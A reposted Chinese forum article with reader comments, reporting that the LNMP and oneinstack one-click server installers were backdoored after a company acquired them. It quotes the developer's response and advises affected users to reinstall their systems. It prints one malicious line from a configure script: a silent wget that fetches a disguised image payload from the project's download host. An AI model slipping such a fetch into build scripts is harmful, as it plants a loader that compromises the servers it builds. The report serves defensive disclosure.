[转载][威胁情报]继LNMP后oneinstack也被添加了后门!

9月下旬,国内安全公司发现知名Web集成环境安装脚本 “lnmp一键安装包” 被投毒,开发者、站长、企业IT管理员下载的一键安装包被加了后门程序。

图片

当时我们都以为这是LNMP一键安装包的服务器被黑了,不过后来有网友发现LNMP 一键安装包已经被金华市矜贵网络科技有限公司(下称金华矜贵)收购。

而关于安装包被投毒问题金华矜贵没有发布任何声明,LNMP论坛的发帖也遭到管理员删除。

图片

现在来看这并不是服务器被黑了,因为被金华矜贵收购的另一个集成环境安装脚本 oneinstack 也被发现投毒,所以情况很明了了:

那就是根本不是服务器被黑,而是他们自己在脚本里插入了恶意代码主动投毒,用来下载某些恶意软件,进而可以控制大量网站或服务器,但具体目的尚不清楚。

目前在 GitHubV2EX 上已经有帖子在讨论这件事,鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了),他们后续可能还会盯上其他一键安装包,因此建议大家不要再使用这类一键安装包,否则自己的网站或服务器可能也会变成肉鸡。

oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的几个面板以及安装包主要是为了布局类似宝塔的产品。想依赖 oneinstack 打开知名度。公司作为项目的投资商。协商的协议为公司为项目提供开发资金,并提供所有服务器资源。但是项目的管理权限以及运维权限都在我手中。目前各位开发者的精力主要是进行新的面板开发,对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。后续会加强安全措施。杜绝该问题的出现。

图片

恶意代码隐藏在图片里

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

GitHub讨论地址

https://github.com/oneinstack/oneinstack/issues/511

如果你最近使用过 LNMP 一键安装包、oneinstack、WDCP 之类的部署过环境,建议直接重装系统。

【原文链接】【威胁情报】继LNMP后oneinstack也被添加了后门!

本作品采用《CC 协议》,转载必须注明作者和本文链接
it_cwc
《L03 构架 API 服务器》
你将学到如 RESTFul 设计风格、PostMan 的使用、OAuth 流程,JWT 概念及使用 和 API 开发相关的进阶知识。
《L02 从零构建论坛系统》
以构建论坛项目 LaraBBS 为线索,展开对 Laravel 框架的全面学习。应用程序架构思路贴近 Laravel 框架的设计哲学。
讨论数量: 13

真的荒诞,可以明目张胆这样干却不用付出任何代价

6个月前 评论

php study 的没事吧

6个月前 评论
linzhijun 6个月前
凌晨三点半的卢本伟 6个月前

还好从来不用集成环境。

6个月前 评论

只能重装系统才能解决?

6个月前 评论
it_cwc (楼主) 6个月前

主动投毒?,我靠 那就无耻了

6个月前 评论

整天说网络安全,那么明显的犯罪都没人管

6个月前 评论
it_cwc (楼主) 6个月前

:joy:自己打个docker镜像吧 把常用的PHP技术栈的东西都打包进去

6个月前 评论
it_cwc (楼主) 6个月前
梦想星辰大海

真吓人,还好我都是手动编译的。

6个月前 评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!